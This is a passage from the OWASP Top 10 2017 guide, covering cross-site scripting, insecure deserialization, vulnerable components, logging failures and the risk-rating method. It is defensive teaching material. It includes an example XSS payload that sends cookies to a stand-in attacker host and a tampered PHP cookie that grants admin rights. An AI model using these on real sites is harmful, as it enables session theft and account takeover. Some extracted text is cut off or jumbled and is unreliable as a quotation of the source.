Reflected XSS: The application or API includes unvalidated and
unescaped user input as part of HTML output. A successful
attack can allow the attacker to execute arbitrary HTML and
interact with some malicious link that points to an attacker-
controlled page, such as malicious watering hole websites,
advertisements, or similar.
Stored XSS: The application or API stores unsanitized user
input that is viewed at a later time by another user or an
administrator. Stored XSS is often considered a high or critical
risk.
DOM XSS: JavaScript frameworks, single-page applications, and
APIs that dynamically include attacker-controllable data to a
page are vulnerable to DOM XSS. Ideally, the application would
not send attacker-controllable data to unsafe JavaScript APIs.
Typical XSS attacks include session stealing, account takeover,
MFA bypass, DOM node replacement or defacement (such as
trojan login panels), attacks against the user's browser such as
malicious software downloads, key logging, and other client-side
attacks.
Preventing XSS requires separation of untrusted data from
active browser content. This can be achieved by:
Using frameworks that automatically escape XSS by design,
such as the latest Ruby on Rails, React JS. Learn the
limitations of each framework's XSS protection and
appropriately handle the use cases which are not covered.
Escaping untrusted HTTP request data based on the context in
the HTML output (body, attribute, JavaScript, CSS, or URL) will
resolve Reflected and Stored XSS vulnerabilities. The OWASP
Cheat Sheet 'XSS Prevention' has details on the required data
escaping techniques.
Applying context-sensitive encoding when modifying the
browser document on the client side acts against DOM XSS.
When this cannot be avoided, similar context sensitive
escaping techniques can be applied to browser APIs as
described in the OWASP Cheat Sheet 'DOM based XSS
Prevention'.
Enabling a Content Security Policy (CSP) is a defense-in-depth
mitigating control against XSS. It is effective if no other
vulnerabilities exist that would allow placing malicious code via
local file includes (e.g. path traversal overwrites or vulnerable
libraries from permitted content delivery networks).

Scenario 1: The application uses untrusted data in the

construction of the following HTML snippet without validation or
escaping:
(String) page += "<input name='creditcard' type='TEXT'
value='" + request.getParameter("CC") + "'>";
'><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
current session.
Note: Attackers can use XSS to defeat any automated Cross-
Site Request Forgery ( CSRF) defense the application might
employ.
OWASP Proactive Controls: Encode Data
OWASP Proactive Controls: Validate Data
OWASP Application Security Verification Standard: V5
OWASP Testing Guide: Testing for Reflected XSS
OWASP Testing Guide: Testing for Stored XSS
OWASP Testing Guide: Testing for DOM XSS
OWASP Cheat Sheet: XSS Prevention
OWASP Cheat Sheet: DOM based XSS Prevention
OWASP Cheat Sheet: XSS Filter Evasion
OWASP Java Encoder Project
CWE-79: Improper neutralization of user supplied input
PortSwigger: Client-side template injection
 14

Threat
Agents

App. Specific Exploitability: 1 Prevalence: 2 Detectability: 2 Technical: 3 Business ?

Exploitation of deserialization is
somewhat difficult, as off the shelf
exploits rarely work without changes
or tweaks to the underlying exploit
code.
This issue is included in the Top 10 based on an
industry survey and not on quantifiable data.
Some tools can discover deserialization flaws, but
human assistance is frequently needed to validate
the problem. It is expected that prevalence data for
deserialization flaws will increase as tooling is
developed to help identify and address it.
The impact of deserialization flaws
cannot be understated. These flaws
can lead to remote code execution
attacks, one of the most serious
attacks possible.
The business impact depends on the
protection needs of the application
and data.

Applications and APIs will be vulnerable if they deserialize hostile
or tampered objects supplied by an attacker.
This can result in two primary types of attacks:
Object and data structure related attacks where the attacker
modifies application logic or achieves arbitrary remote code
execution if there are classes available to the application that
can change behavior during or after deserialization.
Typical data tampering attacks, such as access-control-related
attacks, where existing data structures are used but the content
is changed.
Serialization may be used in applications for:
Remote- and inter-process communication (RPC/IPC)
Wire protocols, web services, message brokers
Caching/Persistence
Databases, cache servers, file systems
HTTP cookies, HTML form parameters, API authentication
tokens
The only safe architectural pattern is not to accept serialized
objects from untrusted sources or to use serialization mediums
that only permit primitive data types.
If that is not possible, consider one of more of the following:
Implementing integrity checks such as digital signatures on any
serialized objects to prevent hostile object creation or data
tampering.
Enforcing strict type constraints during deserialization before
object creation as the code typically expects a definable set of
classes. Bypasses to this technique have been demonstrated,
so reliance solely on this is not advisable.
Isolating and running code that deserializes in low privilege
environments when possible.
Logging deserialization exceptions and failures, such as where
the incoming type is not the expected type, or the
deserialization throws exceptions.
Restricting or monitoring incoming and outgoing network
connectivity from containers or servers that deserialize.
Monitoring deserialization, alerting if a user deserializes
constantly.

Scenario #1: A React application calls a set of Spring Boot

microservices. Being functional programmers, they tried to
ensure that their code is immutable. The solution they came up
with is serializing user state and passing it back and forth with
each request. An attacker notices the "R00" Java object
signature, and uses the Java Serial Killer tool to gain remote
code execution on the application server.
Scenario #2: A PHP forum uses PHP object serialization to save
a "super" cookie, containing the user's user ID, role, password
hash, and other state:
a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";
i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
An attacker changes the serialized object to give themselves
admin privileges:
a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";
i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
OWASP Cheat Sheet: Deserialization
OWASP Proactive Controls: Validate All Inputs
OWASP Application Security Verification Standard
OWASP AppSecEU 2016: Surviving the Java Deserialization
Apocalypse
OWASP AppSecUSA 2017: Friday the 13th JSON Attacks
CWE-502: Deserialization of Untrusted Data
Java Unmarshaller Security
OWASP AppSec Cali 2015: Marshalling Pickles
 15

Threat
Agents

App. Specific Exploitability: 2 Prevalence: 3 Detectability: 2 Technical: 2 Business ?

While it is easy to find already-written
exploits for many known
vulnerabilities, other vulnerabilities
require concentrated effort to develop
a custom exploit.
Prevalence of this issue is very widespread.
Component-heavy development patterns can lead to
development teams not even understanding which
components they use in their application or API,
much less keeping them up to date.
Some scanners such as retire.js help in detection,
but determining exploitability requires additional
effort.
While some known vulnerabilities
lead to only minor impacts, some of
the largest breaches to date have
relied on exploiting known
vulnerabilities in components.
Depending on the assets you are
protecting, perhaps this risk should
be at the top of the list.

You are likely vulnerable:
If you do not know the versions of all components you use
(both client-side and server-side). This includes components
you directly use as well as nested dependencies.
If software is vulnerable, unsupported, or out of date. This
includes the OS, web/application server, database
management system (DBMS), applications, APIs and all
components, runtime environments, and libraries.
If you do not scan for vulnerabilities regularly and subscribe to
security bulletins related to the components you use.
If you do not fix or upgrade the underlying platform,
frameworks, and dependencies in a risk-based, timely fashion.
This commonly happens in environments when patching is a
monthly or quarterly task under change control, which leaves
organizations open to many days or months of unnecessary
exposure to fixed vulnerabilities.
If software developers do not test the compatibility of updated,
upgraded, or patched libraries.
If you do not secure the components' configurations
(see A6:2017-Security Misconfiguration).
There should be a patch management process in place to:
Remove unused dependencies, unnecessary features,
components, files, and documentation.
Continuously inventory the versions of both client-side and
server-side components (e.g. frameworks, libraries) and their
dependencies using tools like versions, DependencyCheck,
retire.js, etc. Continuously monitor sources like CVE and NVD
for vulnerabilities in the components. Use software composition
analysis tools to automate the process. Subscribe to email
alerts for security vulnerabilities related to components you
use.
Only obtain components from official sources over secure links.
Prefer signed packages to reduce the chance of including a
modified, malicious component.
Monitor for libraries and components that are unmaintained or
do not create security patches for older versions. If patching is
not possible, consider deploying a virtual patch to monitor,
detect, or protect against the discovered issue.
Every organization must ensure that there is an ongoing plan for
monitoring, triaging, and applying updates or configuration
changes for the lifetime of the application or portfolio.

Scenario #1: Components typically run with the same privileges

as the application itself, so flaws in any component can result in
serious impact. Such flaws can be accidental (e.g. coding error)
or intentional (e.g. backdoor in component). Some example
exploitable component vulnerabilities discovered are:
CVE-2017-5638, a Struts 2 remote code execution vulnerability
that enables execution of arbitrary code on the server, has
been blamed for significant breaches.
While internet of things (IoT) are frequently difficult or
impossible to patch, the importance of patching them can be
great (e.g. biomedical devices).
There are automated tools to help attackers find unpatched or
misconfigured systems. For example, the Shodan IoT search
engine can help you find devices that still suffer from
the Heartbleed vulnerability that was patched in April 2014.
OWASP Application Security Verification Standard: V1
Architecture, design and threat modelling
OWASP Dependency Check (for Java and .NET libraries)
OWASP Testing Guide: Map Application Architecture (OTG-
INFO-010)
OWASP Virtual Patching Best Practices
The Unfortunate Reality of Insecure Libraries
MITRE Common Vulnerabilities and Exposures (CVE) search
National Vulnerability Database (NVD)
Retire.js for detecting known vulnerable JavaScript libraries
Node Libraries Security Advisories
Ruby Libraries Security Advisory Database and Tools

Threat
Agents
App. Specific Exploitability: 2 Prevalence: 3
Exploitation of insufficient logging and This issue is included in the Top 10 based on an
monitoring is the bedrock of nearly industry survey.
every major incident.
One strategy for determining if you have sufficient
Attackers rely on the lack of monitoring is to examine the logs following
monitoring and timely response to
achieve their goals without being recorded sufficiently to understand what damages
detected. they may have inflicted.
Insufficient logging, detection, monitoring and active response
occurs any time:
Auditable events, such as logins, failed logins, and high-value
transactions are not logged.
Warnings and errors generate no, inadequate, or unclear log
messages.
Logs of applications and APIs are not monitored for suspicious
activity.
Logs are only stored locally.
Appropriate alerting thresholds and response escalation
processes are not in place or effective.
Penetration testing and scans by DAST tools (such as OWASP
ZAP) do not trigger alerts.
The application is unable to detect, escalate, or alert for active
attacks in real time or near real time.
You are vulnerable to information leakage if you make logging
and alerting events visible to a user or an attacker (see A3:2017-
Sensitive Information Exposure).
Scenario #1: An open source project forum software run by a
small team was hacked using a flaw in its software. The
attackers managed to wipe out the internal source code
repository containing the next version, and all of the forum
contents. Although source could be recovered, the lack of
monitoring, logging or alerting led to a far worse breach. The
forum software project is no longer active as a result of this
issue.
Scenario #2: An attacker uses scans for users using a common
password. They can take over all accounts using this password.
For all other users, this scan leaves only one false login behind.
After some days, this may be repeated with a different password.
Scenario #3: A major US retailer reportedly had an internal
malware analysis sandbox analyzing attachments. The sandbox
software had detected potentially unwanted software, but no one
responded to this detection. The sandbox had been producing
warnings for some time before the breach was detected due to
fraudulent card transactions by an external bank.
16
Detectability: 1 Technical: 2 Business ?
Most successful attacks start with
vulnerability probing. Allowing such
probes to continue can raise the
likelihood of successful exploit to
nearly 100%.
In 2016, identifying a breach took an
average of 191 days plenty of time
for damage to be inflicted.
As per the risk of the data stored or processed by the
application:
Ensure all login, access control failures, and server-side input
validation failures can be logged with sufficient user context to
identify suspicious or malicious accounts, and held for sufficient
time to allow delayed forensic analysis.
Ensure that logs are generated in a format that can be easily
consumed by a centralized log management solutions.
Ensure high-value transactions have an audit trail with integrity
controls to prevent tampering or deletion, such as append-only
database tables or similar.
Establish effective monitoring and alerting such that suspicious
activities are detected and responded to in a timely fashion.
Establish or adopt an incident response and recovery plan,
such as NIST 800-61 rev 2 or later.
There are commercial and open source application protection
frameworks such as OWASP AppSensor, web application
firewalls such as ModSecurity with the OWASP ModSecurity
Core Rule Set, and log correlation software with custom
dashboards and alerting.
OWASP Proactive Controls: Implement Logging and Intrusion
Detection
OWASP Application Security Verification Standard: V8 Logging
and Monitoring
OWASP Testing Guide: Testing for Detailed Error Code
OWASP Cheat Sheet: Logging
CWE-223: Omission of Security-relevant Information
CWE-778: Insufficient Logging
 17

Whether you are new to web application security or already very familiar with these risks, the task of producing a secure web
application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be
daunting.
To help organizations and developers reduce their application security risks in a cost-effective manner, OWASP has
produced numerous free and open resources that you can use to address application security in your organization. The
following are some of the many resources OWASP has produced to help organizations produce secure web applications and
APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of
their applications and APIs.

There are numerous additional OWASP resources available for your use. Please visit the OWASP Projects page, which lists all the
Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our wiki, and
many OWASP documents can be ordered in hardcopy or as eBooks.
 18

correctly
implemented, and used everywhere it is supposed to be. The goal of application security testing is to provide this evidence.
The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme
pressure on traditional approaches and tools. So we strongly encourage you to put some thought into how you are going to
-effectively.
Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or
so are long gone. Modern software development requires continuous application security testing across the entire software

development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a
single application, multiplied by the size of your application portfolio.
 19

Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish
effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the
numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous
volume of vulnerabilities.
OWASP recommends organizations establish an application security program to gain insight and improve security across
their applications and APIs. Achieving application security requires many different parts of an organization to work together
efficiently, including security and audit, software development, business, and executive management. Security should be

posture. Focus on the activities and outcomes that actually help improve enterprise security by eliminating or reducing risk.
OWASP SAMM and the OWASP Application Security Guide for CISOs is the source of most of the key activities in this list.
 20

Applications belong to the most complex systems humans regularly create and maintain. IT management for an application
should be performed by IT specialists who are responsible for the overall IT lifecycle of an application. We suggest
establishing the role of application manager as technical counterpart to the application owner. The application manager is in
charge of the whole application lifecycle from the IT perspective, from collecting the requirements until the process of retiring
systems, which is often overlooked.
 21

The Risk Rating methodology for the Top 10 is based on the OWASP Risk Rating Methodology. For each Top 10 category,
we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood
factors and impact factors for each common weakness. We then ordered the Top 10 according to those weaknesses that
typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as
things change and evolve.
The OWASP Risk Rating Methodology defines numerous factors to help calculate the risk of an identified vulnerability.
However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs.
Consequently, we can never be as precise as application owners or managers when calculating risks for their application(s).
You are best equipped to judge the importance of your applications and data, what your threats are, and how your system
has been built and is being operated.
Our methodology includes three likelihood factors for each weakness (prevalence, detectability, and ease of exploit) and one
impact factor (technical impact). The risk scales for each factor range from 1-Low to 3-High with terminology specific for each
factor. The prevalence of a weakness is
supplied prevalence statistics from a number of different organizations (as referenced in the Acknowledgements on page 25),
and we have aggregated their data together to come up with a Top 10 likelihood of existence list by prevalence. This data
was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for
each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up
with an overall risk ranking for each item in the Top 10 (the higher the result the higher the risk). Detectability, Ease of Exploit,
and Impact were calculated from analyzing reported CVEs that were associated with each of the Top 10 categories.
Note: This approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various
technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood
of an attacker finding and exploiting a particular vulnerability. This rating does not take into account the actual impact on your
business. Your organization will have to decide how much security risk from applications and APIs the organization is willing
to accept given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk
analysis for you.
The following illustrates our calculation of the risk for A6:2017-Security Misconfiguration.

Threat
Agents

Application Exploitability Prevalence Detectability Technical Business

Specific EASY: 3 WIDESPREAD: 3 EASY: 3 MODERATE: 2 Specific
 22

The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned
to each risk. These factors were determined based on the available statistics and the experience of the OWASP Top 10
team. To understand these risks for a particular application or organization, you must consider your own specific threat
agents and business impacts. Even severe software weaknesses may not present a serious risk if there are no threat agents
in a position to perform the necessary attack or the business impact is negligible for the assets involved .

Score
Threat
Agents Exploitability Prevalence Detectability Technical Business
A1:2017- App App
EASY: 3 COMMON: 2 EASY: 3 SEVERE: 3 8.0
Injection Specific Specific

A2:2017- App App

Authentication Specific EASY: 3 COMMON: 2 AVERAGE: 2 SEVERE: 3 Specific 7.0

A3:2017- App App

Sens. Data Exposure Specific AVERAGE: 2 WIDESPREAD: 3 AVERAGE: 2 SEVERE: 3 Specific 7.0

A4:2017-XML Exter- App App

AVERAGE: 2 COMMON: 2 EASY: 3 SEVERE: 3 7.0
nal Entities (XXE) Specific Specific

A5:2017-Broken App App

Access Control Specific AVERAGE: 2 COMMON: 2 AVERAGE: 2 SEVERE: 3 Specific 6.0

A6:2017-Security App App

Misconfiguration Specific EASY: 3 WIDESPREAD: 3 EASY: 3 MODERATE: 2 Specific 6.0

A7:2017-Cross-Site App App

Scripting (XSS) Specific EASY: 3 WIDESPREAD: 3 EASY: 3 MODERATE: 2 Specific 6.0

A8:2017-Insecure App App

Deserialization Specific DIFFICULT: 1 COMMON: 2 AVERAGE: 2 SEVERE: 3 Specific 5.0

A9:2017-Vulnerable App App

Components Specific AVERAGE: 2 WIDESPREAD: 3 AVERAGE: 2 MODERATE: 2 Specific 4.7

A10:2017-Insufficient App App

Logging&Monitoring Specific AVERAGE: 2 WIDESPREAD: 3 DIFFICULT: 1 MODERATE: 2 Specific 4.0

The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in your organization.
Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that
are being identified all the time. Other important application security risks (ordered by CWE-ID) that you should additionally
consider include:
CWE-352: Cross-Site Request Forgery (CSRF)
CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', 'AppDoS')
CWE-434: Unrestricted Upload of File with Dangerous Type
CWE-451: User Interface (UI) Misrepresentation of Critical Information (Clickjacking and others)
CWE-601: Unvalidated Forward and Redirects
CWE-799: Improper Control of Interaction Frequency (Anti-Automation)
CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)
CWE-918: Server-Side Request Forgery (SSRF)
 23

At the OWASP Project Summit, active participants and community members decided on a vulnerability view, with up to two
(2) forward looking vulnerability classes, with ordering defined partially by quantitative data, and partially by qualitative
surveys.

mentioned in feedback to 2017 RC1 on the Top 10 mailing list. We put them into a ranked survey and asked respondents to
rank the top four vulnerabilities that they felt should be included in the OWASP Top 10 - 2017. The survey was open from
Aug 2 Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.

1 Exposure of Private Information ('Privacy Violation') [CWE-359] 748

2 Cryptographic Failures [CWE-310/311/312/326/327] 584
3 Deserialization of Untrusted Data [CWE-502] 514
4 Authorization Bypass Through User-Controlled Key (IDOR* & Path Traversal) [CWE-639] 493
5 Insufficient Logging and Monitoring [CWE-223 / CWE-778] 440

Exposure of Private Information is clearly the highest-ranking vulnerability, but fits very easily as an additional emphasis into
the existing A3:2017-Sensitive Data Exposure. Cryptographic Failures can fit within Sensitive Data Exposure. Insecure
deserialization was ranked at number three, so it was added to the Top 10 as A8:2017-Insecure Deserialization after risk
rating. The fourth ranked User-Controlled Key is included in A5:2017-Broken Access Control; it is good to see it rank highly
on the survey, as there is not much data relating to authorization vulnerabilities. The number five ranked category in the
survey is Insufficient Logging and Monitoring, which we believe is a good fit for the Top 10 list, which is why it has become
A10:2017-Insufficient Logging & Monitoring. We have moved to a point where applications need to be able to define what
may be an attack and generate appropriate logging, alerting, escalation and response.

Traditionally, the data collected and analyzed was more along the lines of frequency data: how many vulnerabilities were
found in tested applications. As is well known, tools traditionally report all instances found of a vulnerability and humans
traditionally report a single finding with a number of examples. This makes it very difficult to aggregate the two styles of
reporting in a comparable manner.

For 2017, the incidence rate was calculated by how many applications in a given data set had one or more of a specific
vulnerability type. The data from many larger contributors was provided in two views. The first was the traditional frequency
style of counting every instance found of a vulnerability, while the second was the count of applications in which each
vulnerability was found in (one or more times). While not perfect, this reasonably allows us to compare the data from Human
Assisted Tools and Tool Assisted Humans. The raw data and analysis work is available in GitHub. We intend to expand on
this with additional structure for future versions of the Top 10.

We received 40+ submissions in the call for data, and because many were from the original data call that was focused on
frequency, we were able to use data from 23 contributors covering ~114,000 applications. We used a one-year block of time
where possible and identified by the contributor. The majority of applications are unique, though we acknowledge the
likelihood of some repeat applications between the yearly data from Veracode. The 23 data sets used were either identified
as tool assisted human testing or specifically provided incidence rate from human assisted tools. Anomalies in the selected
data of 100%+ incidence were adjusted down to 100% max. To calculate the incidence rate, we calculated the percentage of
the total applications there were found to contain each vulnerability type. The ranking of incidence was used for the
prevalence calculation in the overall risk for ranking the Top 10.
 24

many organizations that contributed their vulnerability data to support the 2017 update:

For the first time, all the data contributed to a Top 10 release, and the full list of contributors is publicly available.

the individual contributors who spent many hours collectively contributing to the Top 10 in GitHub:
ak47gen drwetter ilatypov neo00 starbuck3000
alonergan dune73 irbishop nickthetait stefanb
ameft ecbftw itscooper ninedter sumitagarwalusa
anantshri einsweniger ivanr ossie-git taprootsec
bandrzej ekobrin jeremylong PauloASilva tghosth
bchurchill eoftedal jhaddix PeterMosmans TheJambo
binarious frohoff jmanico pontocom thesp0nge
bkimminich fzipi joaomatosf psiinon toddgrotenhuis
Boberski gebl jrmithdobbs pwntester troymarshall
borischen Gilc83 jsteven raesene tsohlacol
Calico90 gilzow jvehent riramar vdbaan
chrish global4g katyanton ruroot yohgaki
clerkendweller grnd kerberosmansour securestep9
D00gs h3xstream koto securitybits
davewichers hiralph m8urnett SPoint42
drkknight HoLyVieR mwcoates sreenathsasikumar

And everyone else who provided feedback via Twitter, email, and other means.

We would be remiss not to mention that Dirk Wetter, Jim Manico, and Osama Elnaggar have provided extensive assistance.
Also, Chris Frohoff and Gabriel Lawrence provided invaluable support in the writing of the new A8:2017-Insecure
Deserialization risk.